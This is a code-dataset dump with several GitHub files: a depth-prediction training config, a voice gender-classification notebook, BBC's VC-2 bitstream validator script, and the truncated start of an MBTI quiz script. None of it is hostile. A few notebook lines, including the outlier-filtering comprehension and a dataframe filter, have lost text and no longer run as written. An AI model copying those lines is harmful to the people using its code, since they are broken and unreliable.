\"/disk0/data/kitti_depth/depth_selection/test_depth_prediction_anonymous\"\n\npath.visualDet3D_path = \"./visualDet3D\" # The path should point to the inner subfolder\npath.project_path = \"./workdirs\" # or other path for pickle files, checkpoints, tensorboard logging and output files.\n\nif not os.path.isdir(path.project_path):\n os.mkdir(path.project_path)\npath.project_path = os.path.join(path.project_path, 'MonoDepth')\nif not os.path.isdir(path.project_path):\n os.mkdir(path.project_path)\n\npath.log_path = os.path.join(path.project_path, \"log\")\nif not os.path.isdir(path.log_path):\n os.mkdir(path.log_path)\n\npath.checkpoint_path = os.path.join(path.project_path, \"checkpoint\")\nif not os.path.isdir(path.checkpoint_path):\n os.mkdir(path.checkpoint_path)\n\npath.preprocessed_path = os.path.join(path.project_path, \"output\")\nif not os.path.isdir(path.preprocessed_path):\n os.mkdir(path.preprocessed_path)\n\npath.train_imdb_path = os.path.join(path.preprocessed_path, \"training\")\nif not os.path.isdir(path.train_imdb_path):\n os.mkdir(path.train_imdb_path)\n\npath.val_imdb_path = 
os.path.join(path.preprocessed_path, \"validation\")\nif not os.path.isdir(path.val_imdb_path):\n os.mkdir(path.val_imdb_path)\n\ncfg.path = path\n\n## optimizer\noptimizer = edict(\n type_name = 'adam',\n keywords = edict(\n lr = 1e-4,\n weight_decay = 0,\n ),\n clipped_gradient_norm = 1.0\n)\ncfg.optimizer = optimizer\n## scheduler\nscheduler = edict(\n type_name = 'CosineAnnealingLR',\n keywords = edict(\n T_max = cfg.trainer.max_epochs,\n eta_min = 1e-5,\n ),\n is_iter_based = False\n)\ncfg.scheduler = scheduler\n\n## data\ndata = edict(\n batch_size = 8,\n num_workers = 8,\n rgb_shape = (352, 1216, 3),\n train_dataset = \"KittiDepthMonoDataset\",\n val_dataset = \"KittiDepthMonoValTestDataset\",\n test_dataset = \"KittiDepthMonoValTestDataset\",\n)\n\ndata.augmentation = edict(\n mirrorProb = 0.5,\n rgb_mean = np.array([0.485, 0.456, 0.406]),\n rgb_std = np.array([0.229, 0.224, 0.225]),\n cropSize = (data.rgb_shape[0], data.rgb_shape[1]),\n)\ndata.train_augmentation = [\n edict(type_name='ConvertToFloat'),\n edict(type_name='CropTop', keywords=edict(output_height=data.rgb_shape[0])),\n edict(type_name='RandomCropToWidth', keywords=dict(width=data.rgb_shape[1])),\n edict(type_name='RandomMirror', keywords=edict(mirror_prob=0.5)),\n edict(type_name='Normalize', keywords=edict(mean=data.augmentation.rgb_mean, stds=data.augmentation.rgb_std))\n]\ndata.test_augmentation = [\n edict(type_name='ConvertToFloat'),\n edict(type_name='CropTop', keywords=edict(output_height=data.rgb_shape[0])),\n edict(type_name='CropRight', keywords=edict(output_width=data.rgb_shape[1])),\n edict(type_name='Normalize', keywords=edict(mean=data.augmentation.rgb_mean, stds=data.augmentation.rgb_std))\n]\ncfg.data = data\n\n## networks\ndetector = edict()\ndetector.name = 'MonoDepth'\ndetector.backbone = edict(\n depth=34,\n pretrained=True,\n frozen_stages=-1,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n norm_eval=False,\n dilations=(1, 1, 1, 1),\n strides=(1, 2, 2, 2),\n)\ndetector.preprocessed_path = path.preprocessed_path\ndetector.max_depth=100\ndetector.output_channel=1\ndetector.SI_loss_lambda=0.8\ndetector.smooth_loss_weight = 0.0\ndetector.minor_weight=1.0\ncfg.detector = detector\n","repo_name":"cnexah/DeepLineEncoding","sub_path":"depth_prediction/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"27413418117","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]\n\n# In[ ]:\n\n\n\n\n\n# ## CONTENTS::\n\n# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)\n\n# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)\n\n# [ **3 ) OutlierTreatment**](#content3)\n\n# [ **4 ) Feature Engineering**](#content4)\n\n# [ **5 ) Preparing the Data**](#content5)\n\n# [ **6 ) Modelling**](#content6)\n\n# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)\n\n# In[ ]:\n\n\n\n\n\n# ## 1.1 ) Importing Various Modules\n\n# In[ ]:\n\n\n# Ignore the warnings\nimport warnings\nwarnings.filterwarnings('always')\nwarnings.filterwarnings('ignore')\n\n# data visualisation and manipulation\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport seaborn as sns\nimport missingno as msno\n\n#configure\n# sets matplotlib to inline and displays graphs below the corressponding 
cell.\nstyle.use('fivethirtyeight')\nsns.set(style='whitegrid',color_codes=True)\n\n#import the necessary modelling algos.\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn import datasets\nfrom sklearn.naive_bayes import GaussianNB\n\n#model selection\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\n\n#preprocess.\nfrom sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder\n\n\n# ## 1.2 ) Loading the Dataset\n\n# In[ ]:\n\n\ntrain=pd.read_csv(r\"../../../input/primaryobjects_voicegender/voice.csv\")\n\n\n# In[ ]:\n\n\ntrain.head(10)\n\n\n#
    \n# ## 2 ) Exploratory Data Analysis (EDA)\n\n# ## 2.1 ) The Features and the 'Target' variable\n\n# In[ ]:\n\n\ndf=train.copy()\n\n\n# In[ ]:\n\n\ndf.head(10)\n\n\n# In[ ]:\n\n\ndf.shape\n\n\n# In[ ]:\n\n\ndf.index \n\n\n# In[ ]:\n\n\ndf.columns # give a short description of each feature.\n\n\n# **#A short description as on 'Data' tab on kaggle is :**\n\n# #### \n# \n# **meanfreq**: mean frequency (in kHz)\n# \n# **sd**: standard deviation of frequency\n# \n# **median**: median frequency (in kHz)\n# \n# **Q25**: first quantile (in kHz)\n# \n# **Q75**: third quantile (in kHz)\n# \n# **IQR**: interquantile range (in kHz)\n# \n# **skew**: skewness (see note in specprop description)\n# \n# **kurt**: kurtosis (see note in specprop description)\n# \n# **sp.ent**: spectral entropy\n# \n# **sfm**: spectral flatness\n# \n# **mode**: mode frequency\n# \n# **centroid**: frequency centroid (see specprop)\n# \n# **peakf**: peak frequency (frequency with highest energy)\n# \n# **meanfun**: average of fundamental frequency measured across acoustic signal\n# \n# **minfun**: minimum fundamental frequency measured across acoustic signal\n# \n# **maxfun**: maximum fundamental frequency measured across acoustic signal\n# \n# **meandom**: average of dominant frequency measured across acoustic signal\n# \n# **mindom**: minimum of dominant frequency measured across acoustic signal\n# \n# **maxdom**: maximum of dominant frequency measured across acoustic signal\n# \n# **dfrange**: range of dominant frequency measured across acoustic signal\n# \n# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range\n# \n# **label**: male or female\n\n# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.\n\n# ## 2.2 ) Missing Values Treatment\n\n# In[ ]:\n\n\n# check for null values.\ndf.isnull().any() \n\n\n# In[ ]:\n\n\nmsno.matrix(df) # just to visualize. no missing value.\n\n\n# ## 2.3 ) Univariate Analysis\n\n# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.\n# \n# Also note that univariate analysis is useful for outlier detection. 
Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.\n\n# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.\n\n# In[ ]:\n\n\ndf.describe()\n\n\n# In[ ]:\n\n\ndef calc_limits(feature):\n q1,q3=df[feature].quantile([0.25,0.75])\n iqr=q3-q1\n rang=1.5*iqr\n return(q1-rang,q3+rang)\n\n\n# In[ ]:\n\n\ndef plot(feature):\n fig,axes=plt.subplots(1,2)\n sns.boxplot(data=df,x=feature,ax=axes[0])\n sns.distplot(a=df[feature],ax=axes[1],color='#ff4125')\n fig.set_size_inches(15,5)\n \n lower,upper = calc_limits(feature)\n l=[df[feature] for i in df[feature] if i>lower and i'female' and 1->'male'.\n# \n# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.\n\n# #### Again similar inferences can be drawn.\n\n# In[ ]:\n\n\nplot_against_target('sd')\n\n\n# In[ ]:\n\n\nplot_against_target('median')\n\n\n# In[ ]:\n\n\nplot_against_target('Q25')\n\n\n# In[ ]:\n\n\nplot_against_target('IQR')\n\n\n# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.\n\n# In[ ]:\n\n\nplot_against_target('sp.ent')\n\n\n# In[ ]:\n\n\nplot_against_target('sfm')\n\n\n# In[ ]:\n\n\nplot_against_target('meanfun') \n\n\n# #### Again high difference in females and males mean fundamental frequency. This is evident from the heat map which clearly shows the high corelation between meanfun and the 'label'.\n\n# In[ ]:\n\n\n\n\n\n# #### Now we move onto analyzing different features pairwise. Since all the features are continuous the most reasonable way to do this is plotting the scatter plots for each feature pair. I have also distinguished males and feamles on the same plot which makes it a bit easier to compare the variation of features within the two classes.\n\n# In[ ]:\n\n\ng = sns.PairGrid(df[['meanfreq','sd','median','Q25','IQR','sp.ent','sfm','meanfun','label']], hue = \"label\")\ng = g.map(plt.scatter).add_legend()\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 3 ) Outlier Treatment\n\n# In this section I have dealt with the outliers. Note that we discovered the potential outliers in the **'univariate analysis' ** section. Now to remove those outliers we can either remove the corressponding data points or impute them with some other statistical quantity like median (robust to outliers) etc..\n\n# #### For now I shall be removing all the observations or data points which are outlier to 'any' feature. Note that this substantially reduces the dataset size.\n\n# In[ ]:\n\n\n# removal of any data point which is an outlier for any fetaure.\nfor col in df.columns:\n lower,upper=calc_limits(col)\n df = df[(df[col] >lower) & (df[col]\n# ## 4 ) Feature Engineering.\n\n# ## 4.1 ) Dropping the features\n\n# I have dropped some columns which according to my analysis proved to be less useful or redundant.\n\n# In[ ]:\n\n\ntemp_df=df.copy()\n\ntemp_df.drop(['skew','kurt','mindom','maxdom'],axis=1,inplace=True) # only one of maxdom and dfrange.\ntemp_df.head(10)\n#df.head(10)\n\n\n# ## 4.2 ) Creating new features\n\n# I have done two new things. 
Firstly I have made 'meanfreq','median' and 'mode' to comply by the standard relation->\n\n# #### ......................................................................................3*Median=2*Mean +Mode.........................................................................\n\n# #### For this I have adjusted values in the 'median' column as shown below. You can alter values in any of the other column say the 'meanfreq' column.\n\n# In[ ]:\n\n\ntemp_df['meanfreq']=temp_df['meanfreq'].apply(lambda x:x*2)\ntemp_df['median']=temp_df['meanfreq']+temp_df['mode']\ntemp_df['median']=temp_df['median'].apply(lambda x:x/3)\n\n\n# In[ ]:\n\n\ntemp_df.head(10) \n\n\n# In[ ]:\n\n\nsns.boxplot(data=temp_df,y='median',x='label') # seeing the new 'median' against the 'label'.\n\n\n# The second new feature that I have added is a new feature to mesure the 'skewness'. \n\n# #### For this I have used the 'Karl Pearson Coefficent' which is calculated as shown below->\n\n# **** ..........................................................Coefficent = (Mean - Mode )/StandardDeviation......................................................****\n\n# **You can also try some other coefficient also and see how it comapres with the target i.e. the 'label' column.**\n\n# In[ ]:\n\n\ntemp_df['pear_skew']=temp_df['meanfreq']-temp_df['mode']\ntemp_df['pear_skew']=temp_df['pear_skew']/temp_df['sd']\ntemp_df.head(10)\n\n\n# In[ ]:\n\n\nsns.boxplot(data=temp_df,y='pear_skew',x='label') # plotting new 'skewness' against the 'label'.\n\n\n# \n# ## 5 ) Preparing the Data\n\n# ## 5.1 ) Normalizing the Features.\n\n# In[ ]:\n\n\nscaler=StandardScaler()\nscaled_df=scaler.fit_transform(temp_df.drop('label',axis=1))\nX=scaled_df\nY=df['label'].as_matrix()\n\n\n# ## 5.2 ) Splitting into Training and Validation sets.\n\n# In[ ]:\n\n\nx_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.20,random_state=42)\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 6 ) Modelling\n\n# #### LOGISTIC REGRESSSION\n\n# In[ ]:\n\n\nclf_lr=LogisticRegression()\nclf_lr.fit(x_train,y_train)\npred=clf_lr.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### kNN\n\n# In[ ]:\n\n\nclf_knn=KNeighborsClassifier()\nclf_knn.fit(x_train,y_train)\npred=clf_knn.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### Support Vector Machine (SVM)\n\n# In[ ]:\n\n\nclf_svm=SVC()\nclf_svm.fit(x_train,y_train)\npred=clf_svm.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### DECISION TREE \n\n# In[ ]:\n\n\nclf_dt=DecisionTreeClassifier()\nclf_dt.fit(x_train,y_train)\npred=clf_dt.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### RANDOM FOREST\n\n# In[ ]:\n\n\nclf_rf=RandomForestClassifier()\nclf_rf.fit(x_train,y_train)\npred=clf_rf.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### GRADIENT BOOSTING\n\n# In[ ]:\n\n\nclf_gb=GradientBoostingClassifier()\nclf_gb.fit(x_train,y_train)\npred=clf_gb.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### We can now move onto comparing the results of various modelling algorithms. 
for tthis I shall combine the results of all models in a data frame and then plot using a barplot .\n\n# In[ ]:\n\n\nmodels=[LogisticRegression(),LinearSVC(),SVC(kernel='rbf'),KNeighborsClassifier(),RandomForestClassifier(),DecisionTreeClassifier(),GradientBoostingClassifier(),GaussianNB()]\nmodel_names=['LogisticRegression','LinearSVM','rbfSVM','KNearestNeighbors','RandomForestClassifier','DecisionTree','GradientBoostingClassifier','GaussianNB']\n\nacc=[]\nd={}\n\nfor model in range(len(models)):\n clf=models[model]\n clf.fit(x_train,y_train)\n pred=clf.predict(x_test)\n acc.append(accuracy_score(pred,y_test))\n \nd={'Modelling Algo':model_names,'Accuracy':acc}\n\n\n# In[ ]:\n\n\nacc_frame=pd.DataFrame(d)\nacc_frame\n\n\n# In[ ]:\n\n\nsns.barplot(y='Modelling Algo',x='Accuracy',data=acc_frame)\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 7 ) Parameter Tuning with GridSearchCV\n\n# 1. I have tuned only SVM Similarly other algorithms can be tuned.\n\n# In[ ]:\n\n\nparams_dict={'C':[0.001,0.01,0.1,1,10,100],'gamma':[0.001,0.01,0.1,1,10,100],'kernel':['linear','rbf']}\nclf=GridSearchCV(estimator=SVC(),param_grid=params_dict,scoring='accuracy',cv=10)\nclf.fit(x_train,y_train)\n\n\n# In[ ]:\n\n\nclf.best_score_\n\n\n# In[ ]:\n\n\nclf.best_params_\n\n\n# In[ ]:\n\n\nprint(accuracy_score(clf.predict(x_test),y_test))\n\n\n# In[ ]:\n\n\nprint(precision_score(clf.predict(x_test),y_test))\n\n\n# ### The precision is almost 99.5 % which is quite high.\n\n# ### After tuning SVM gives an amazing accuracy of around 99.1 %. Similarly tuning other algorithms parameters might give even greater accuracy !!!\n\n# In[ ]:\n\n\n\n\n\n# ## THE END!!!\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"Chenguang-Zhu/relancer-artifact","sub_path":"relancer-exp/original_notebooks/primaryobjects_voicegender/a-complete-tutorial-onpredictive-modeling-acc-99.py","file_name":"a-complete-tutorial-onpredictive-modeling-acc-99.py","file_ext":"py","file_size_in_byte":16404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9995829378","text":"r\"\"\"\n.. _vc2-bitstream-validator:\n\n``vc2-bitstream-validator``\n===========================\n\nA command-line utility for validating VC-2 bitstreams' conformance with the\nVC-2 specification and providing a reference decoding of the pictures within.\n\nUsage\n-----\n\nThis command should be passed a filename containing a candidate VC-2 bitstream.\nFor example, given a valid stream::\n\n $ vc2-bitstream-validator path/to/bitstream.vc2 --output decoded_picture_%d.raw\n No errors found in bitstream. Verify decoded pictures to confirm conformance.\n\nHere the ``--output`` argument specifies the printf-style template for the\ndecoded picture filenames. 
The decoded pictures are written as raw files (see\n:ref:`file-format`).\n\nIf a conformance error is detected, a detailed explanation of the problem is\ndisplayed::\n\n $ vc2-bitstream-validator invalid.vc2\n Conformance error at bit offset 104\n ===================================\n\n Non-zero previous_parse_offset, 5789784, in the parse info at the start of\n a sequence (10.5.1).\n\n\n Details\n -------\n\n Was this parse info block copied from another stream without the\n previous_parse_offset being updated?\n\n Does this parse info block incorrectly include an offset into an adjacent\n sequence?\n\n\n Suggested bitstream viewer commands\n -----------------------------------\n\n To view the offending part of the bitstream:\n\n vc2-bitstream-viewer invalid.vc2 --offset 104\n\n\n Pseudocode traceback\n --------------------\n\n Most recent call last:\n\n * parse_stream (10.3)\n * parse_sequence (10.4.1)\n * parse_info (10.5.1)\n\n vc2-bitstream-validator: error: non-conformant bitstream (see above)\n\nErrors include an explanation of the conformance problem (along with references\nto the VC-2 standards documents) along with possible causes of the error.\nAdditionally, a sample invocation of :ref:`vc2-bitstream-viewer` is given which\ncan be used to display the contents of the bitstream at the offending position.\nFinally, a stack trace for the VC-2 pseudocode functions involved in parsing\nthe stream at the point of failure is also printed.\n\n\nArguments\n---------\n\nThe complete set of arguments can be listed using ``--help``\n\n.. program-output:: vc2-bitstream-validator --help\n\n\"\"\"\n\nimport os\nimport sys\nimport traceback\n\nfrom argparse import ArgumentParser\n\nfrom textwrap import dedent\n\nfrom vc2_conformance.pseudocode.metadata import make_pseudocode_traceback\n\nfrom vc2_conformance import __version__\n\nfrom vc2_conformance.py2x_compat import quote\n\nfrom vc2_conformance.string_utils import wrap_paragraphs\n\nfrom vc2_conformance.file_format import write\n\nfrom vc2_conformance.pseudocode.state import State\n\nfrom vc2_conformance.decoder import (\n init_io,\n parse_stream,\n ConformanceError,\n tell,\n)\n\nfrom vc2_conformance.bitstream import to_bit_offset\n\nfrom vc2_conformance.py2x_compat import get_terminal_size\n\n\ndef format_pseudocode_traceback(tb):\n \"\"\"\n Given a :py:func:`traceback.extract_tb` generated traceback description,\n return a string describing the current stack of VC-2 pseudocode functions\n being called.\n \"\"\"\n ptb = make_pseudocode_traceback(tb)\n\n return \"\\n\".join(\n \"{}* {}\".format(\" \" * num, pdf.citation) for num, pdf in enumerate(ptb)\n )\n\n\nclass BitstreamValidator(object):\n def __init__(self, filename, show_status, verbose, output_filename):\n \"\"\"\n Parameters\n ==========\n filename : str\n The bitstream filename to read from.\n show_status : bool\n If True, show a status line indicating progress during validation.\n verbose : int\n If >=1, show Python stack traces on failure.\n output_filename : str\n A filename pattern for output bitstream files. Should contain a\n printf-style format string (e.g. 
\"picture_%d.raw\").\n \"\"\"\n self._filename = filename\n self._show_status = show_status\n self._verbose = verbose\n self._output_filename = output_filename\n\n # The index to use in the filename of the next decoded picture\n self._next_picture_index = 0\n\n # Is the status line currently visible\n self._status_line_visible = False\n\n def run(self):\n try:\n self._file = open(self._filename, \"rb\")\n self._filesize_bytes = os.path.getsize(self._filename)\n except Exception as e:\n # Catch-all exception handler excuse: Catching only file-related\n # exceptions is challenging, particularly in a backward-compatible\n # manner. However, none of the above are known to produce\n # exceptions *except* due to file-related issues.\n self._print_error(str(e))\n return 1\n\n self._state = State(_output_picture_callback=self._output_picture)\n init_io(self._state, self._file)\n\n if self._show_status:\n self._update_status_line(\"Starting bitstream validation...\")\n\n try:\n parse_stream(self._state)\n self._hide_status_line()\n if tell(self._state) == (0, 7):\n sys.stdout.flush()\n sys.stderr.write(\"Warning: 0 bytes read, bitstream is empty.\\n\")\n print(\n \"No errors found in bitstream. Verify decoded pictures to confirm conformance.\"\n )\n return 0\n except ConformanceError as e:\n # Bitstream failed validation\n exc_type, exc_value, exc_tb = sys.exc_info()\n self._hide_status_line()\n self._print_conformance_error(e, traceback.extract_tb(exc_tb))\n self._print_error(\"non-conformant bitstream (see above)\")\n return 2\n except Exception as e:\n # Internal error (shouldn't happen(!))\n self._hide_status_line()\n self._print_error(\n \"internal error in bitstream validator: {}: {} \"\n \"(probably a bug in this program)\".format(\n type(e).__name__,\n str(e),\n )\n )\n return 3\n\n def _output_picture(self, picture, video_parameters, picture_coding_mode):\n filename = self._output_filename % (self._next_picture_index,)\n self._next_picture_index += 1\n\n write(\n picture,\n video_parameters,\n picture_coding_mode,\n filename,\n )\n\n if self._show_status:\n self._update_status_line(\"Decoded picture written to {}\".format(filename))\n\n def _update_status_line(self, message):\n \"\"\"\n Display/update the status line indicating the progress of the decoding\n process.\n \"\"\"\n self._status_line_visible = True\n\n percent = int(\n round((tell(self._state)[0] * 100.0) / (self._filesize_bytes or 1))\n )\n\n line = \"[{:3d}%] {}\".format(percent, message)\n\n # Ensure stdout is fully displayed before doing anything to the status\n # line.\n sys.stdout.flush()\n\n sys.stderr.write(\n (\n \"\\033[2K\" # Clear to end of line\n \"\\033[s\" # Save cursor position\n \"{}\"\n \"\\033[u\" # Restore cursor position\n ).format(line)\n )\n sys.stderr.flush()\n\n def _hide_status_line(self):\n \"\"\"If the status line is visible, hide it.\"\"\"\n if self._status_line_visible:\n self._status_line_visible = False\n\n # Ensure stdout is fully displayed before doing anything to the\n # status line.\n sys.stdout.flush()\n\n sys.stderr.write(\"\\033[2K\") # Clear to end of line\n sys.stderr.flush()\n\n def _print_conformance_error(self, exception, tb):\n \"\"\"\n Display detailed information from a ConformanceError on stdout.\n \"\"\"\n terminal_width = get_terminal_size()[0]\n\n summary, _, details = wrap_paragraphs(exception.explain()).partition(\"\\n\")\n\n offending_offset = exception.offending_offset()\n if offending_offset is None:\n offending_offset = to_bit_offset(*tell(self._state))\n\n title = 
\"Conformance error at bit offset {}\".format(offending_offset)\n\n bitstream_viewer_hint = (\n dedent(exception.bitstream_viewer_hint())\n .strip()\n .format(\n cmd=\"vc2-bitstream-viewer\",\n file=quote(self._filename),\n offset=offending_offset,\n )\n )\n\n out = \"\"\n\n out += title + \"\\n\"\n out += (\"=\" * len(title)) + \"\\n\"\n out += \"\\n\"\n out += wrap_paragraphs(summary, terminal_width) + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Details\\n\"\n out += \"-------\\n\"\n out += \"\\n\"\n out += wrap_paragraphs(details, terminal_width) + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Suggested bitstream viewer commands\\n\"\n out += \"-----------------------------------\\n\"\n out += \"\\n\"\n out += bitstream_viewer_hint + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Pseudocode traceback\\n\"\n out += \"--------------------\\n\"\n out += \"\\n\"\n out += \"Most recent call last:\\n\"\n out += \"\\n\"\n out += format_pseudocode_traceback(tb) + \"\\n\"\n\n print(out)\n\n def _print_error(self, message):\n \"\"\"\n Print an error message to stderr.\n \"\"\"\n # Avoid interleaving with stdout (and make causality clearer)\n sys.stdout.flush()\n\n # Display the traceback\n if self._verbose >= 1:\n if sys.exc_info()[0] is not None:\n traceback.print_exc()\n\n # Display the message\n prog = os.path.basename(sys.argv[0])\n message = \"{}: error: {}\".format(prog, message)\n sys.stderr.write(\"{}\\n\".format(message))\n\n\ndef parse_args(*args, **kwargs):\n \"\"\"\n Parse a set of command line arguments. Returns a :py:mod:`argparse`\n ``args`` object with the following fields:\n\n * bitstream (str): The filename of the bitstream to read\n * no_status (bool): True if the status line is to be hidden.\n * verbose (int): The verbosity level.\n * output (str): The output picture filename pattern.\n \"\"\"\n parser = ArgumentParser(\n description=\"\"\"\n Validate a bitstream's conformance with the VC-2 specifications.\n \"\"\"\n )\n\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {}\".format(__version__),\n )\n\n parser.add_argument(\n \"bitstream\",\n help=\"\"\"\n The filename of the bitstream to validate.\n \"\"\",\n )\n\n parser.add_argument(\n \"--no-status\",\n \"--quiet\",\n \"-q\",\n action=\"store_true\",\n default=False,\n help=\"\"\"\n Do not display a status line on stderr while validating the\n bitstream.\n \"\"\",\n )\n\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"count\",\n default=0,\n help=\"\"\"\n Show full Python stack-traces on failure.\n \"\"\",\n )\n\n parser.add_argument(\n \"--output\",\n \"-o\",\n default=\"picture_%d.raw\",\n help=\"\"\"\n The filename pattern for decoded picture data and metadata. The\n supplied pattern should a 'printf' style template with (e.g.) '%%d'\n where an index will be substituted. The first decoded picture will\n be assigned index '0', the second '1' and so on -- i.e. these\n indices are unrelated to the picture number. The file extension\n supplied will be stripped and two files will be written for each\n decoded picture: a '.raw' planar image file and a '.json' JSON\n metadata file. 
(Default: %(default)s).\n \"\"\",\n )\n\n args = parser.parse_args(*args, **kwargs)\n\n try:\n args.output % (0,)\n except TypeError as e:\n parser.error(\"--output is not a valid printf template: {}\".format(e))\n\n return args\n\n\ndef main(*args, **kwargs):\n args = parse_args(*args, **kwargs)\n\n validator = BitstreamValidator(\n filename=args.bitstream,\n show_status=not args.no_status,\n verbose=args.verbose,\n output_filename=args.output,\n )\n return validator.run()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"bbc/vc2_conformance","sub_path":"vc2_conformance/scripts/vc2_bitstream_validator.py","file_name":"vc2_bitstream_validator.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"28628996696","text":"import itertools\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom os import system, name\r\nimport re\r\nimport random\r\nimport time\r\n\r\ndef clear(): # Clear the Terminal\r\n _ = system('cls') if name == 'nt' else system('clear')\r\n\r\n \r\nlist_func = [\"Ti\",\"Te\",\"Si\",\"Se\",\"Ni\",\"Ne\",\"Fi\",\"Fe\"]\r\n\r\n\r\ndef main():\r\n response = \"\"\r\n while \"C\" not in response and \"T\" not in response:\r\n response = input(\"Do you want to enter a code OR do you want to do a test ? [C/T]\\n>>>\").upper()\r\n\r\n if response == \"T\": # Test\r\n score = test()\r\n analysis(score)\r\n plot(score)\r\n code = \"\".join(map(lambda l: hex(l).zfill(2)[2:4],score))\r\n print(f\"If you want to see your results again, is here your code:\\n{code}\")\r\n\r\n else:\r\n code = \"\" #640a0f4b32051419\r\n while len(code) != 16:\r\n code = input(\"Enter the code:\\n>>>\")\r\n if len(code)!=16:\r\n print(\"This code isn't valid. Please verify the validity of the code\")\r\n\r\n code = re.findall('..',code) # [\"01\",\"23\",\"45\",\"67\",...]\r\n code = [*map(lambda e: int(e,16),code)] # Transform strings in Hexa to int\r\n analysis(code)\r\n plot(code)\r\n\r\n exit()\r\n\r\n\r\ndef test():\r\n score = [0]*8\r\n lang = \"\"\r\n while \"fr\" not in lang and \"en\" not in lang and \"uk\" not in lang and \"kr\" not in lang and \"jp\" not in lang:\r\n lang = input(\"Do you want the test in English or French or Ukrainian or Korean or Japanese ? 
[en/fr/uk/kr/jp]\\n>>>\").lower()\r\n if lang == \"fr\":\r\n from FR_questions_mbti import question_about_mbti as CF\r\n elif lang == \"en\":\r\n from ENG_questions_mbti import question_about_mbti as CF \r\n elif lang == \"uk\":\r\n from UK_questions_mbti import question_about_mbti as CF \r\n elif lang == \"jp\":\r\n from JP_questions_mbti import question_about_mbti as CF \r\n else: \r\n from KR_questions_mbti import question_about_mbti as CF\r\n\r\n clear()\r\n questions = [*range(80)]\r\n choi = [[\"Ti\",\"Te\"],[\"Fi\",\"Fe\"],[\"Si\",\"Se\"],[\"Ni\",\"Ne\"]]\r\n while questions != []:\r\n n = random.choice(questions)\r\n asking = True\r\n while asking:\r\n asking = False\r\n print(\"The sentence is:\")\r\n try:\r\n print('\"'+CF[\"TFSN\"[n//20]][str((1+(n%20//2)))][choi[(n)//20][n%2]]+'\"\\n')\r\n except Exception as e:\r\n print(e,n)\r\n time.sleep(100)\r\n \r\n\r\n try:\r\n note = int(input(\"Note this sentence from 0 to 10.\\n>>>\"))\r\n clear()\r\n asking = note < 0 or note > 10\r\n if asking:\r\n print(f\"The number should be between [0;10], not {note}\")\r\n except ValueError:\r\n clear()\r\n print(\"This isn't a number\")\r\n asking = True\r\n \r\n i = 0\r\n if n > 59:\r\n i = 4\r\n if 60 > n > 39:\r\n i = 2\r\n if 40 > n > 19:\r\n i = 6\r\n i+=n%2\r\n score[i] += note\r\n questions.remove(n)\r\n\r\n return score\r\n \r\n \r\n\r\ndef analysis(score):\r\n \"\"\"\r\n \r\n Analysis a score\r\n score is [Ti, Te, Si, Se, Ni, Ne, Fi, Fe]\r\n \r\n \"\"\"\r\n # Creating a New List \r\n sort_score = [score[i]for i in range(8)]\r\n sort_score = sorted(sort_score)\r\n\r\n # Creating a list for Type and score type\r\n list_type = [\r\n [\"IE\"[i // 8] + \"NS\"[(i // 4) % 2] + \"TF\"[(i // 2) % 2] + \"PJ\"[i % 2], 500]\r\n for i in range(16)\r\n ]\r\n\r\n score_func = [[list_func[i],score[i]]for i in range(8)]\r\n\r\n # List of \"Stack\" of function by MBTI Type\r\n list_typofunc = [ 